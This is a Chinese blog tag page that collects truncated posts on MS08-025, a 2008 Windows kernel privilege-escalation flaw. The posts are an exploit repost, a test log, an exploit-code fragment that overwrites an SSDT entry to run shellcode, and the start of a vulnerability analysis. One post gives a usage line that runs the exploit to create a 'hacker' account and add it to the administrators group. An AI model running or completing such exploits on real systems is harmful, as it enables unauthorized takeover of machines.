标签 ‘MS08-025’ 下的日志

又一个MS08-025

update(2008.5.9):姬良:“这个和网上的不同,这个不是用双引号括住命令,而是用参数-s”

来源:%5C

真正可用的MS08025。
为了多次运行,服务器蓝屏,请直接用一次运行所有的命令
比如:
MS08025 “cmd.exe /c net user hacker hacker /add & net localgroup administrators hacker /add”

Local Privilege Escalation Vulnerability Exploit(MS08025)

阅读全文 »

Tags: ,

MS08-025 for win2k & win2k3

来源:酒水不犯茶水

Win2k CN SP2 ,Win2k3 CN SP1下测试通过,其它未测试(不装XP那种垃圾)
D:\>whoami
BAICKER-VMWARE\009
D:\>net user hack /add
系统发生 5 错误。
拒绝访问。

阅读全文 »

Tags: ,

MS08-025 win32k.sys NtUserFnOUTSTRING Privilege Escalation Exploit

来源:vessial’s easylife

另一种利用方式,通过覆盖SSDT表NtVdmControl的地址进行shellcode的执行
#include <stdio.h>
#include <windows.h>
typedef LONG NTSTATUS;
typedef NTSTATUS (NTAPI *PNTALLOCATE)(HANDLE               ProcessHandle,

阅读全文 »

Tags: , ,

Windows 内核漏洞 ms08025 分析

来源:安全焦点
Author: Polymorphours
Email: [email protected]
Homepage:http://www.whitecell.org
Date: 2008-04-10

经内部讨论后决定公布分析成果。

4月8号microsoft再次发布了一个系统内核的补丁(KB941693),微软对该漏洞的描述为: 此安全更新解决 Windows 内核中一个秘密报告的漏洞。 成功利用此漏洞的本地攻击者可以完全控制受影响的系统。 攻击者可随后安装程序;查看、更改或删除数据;或者创建新帐户。这是用于 Windows 2000、Windows XP、Windows Server 2003、Windows 阅读全文 »

Tags: ,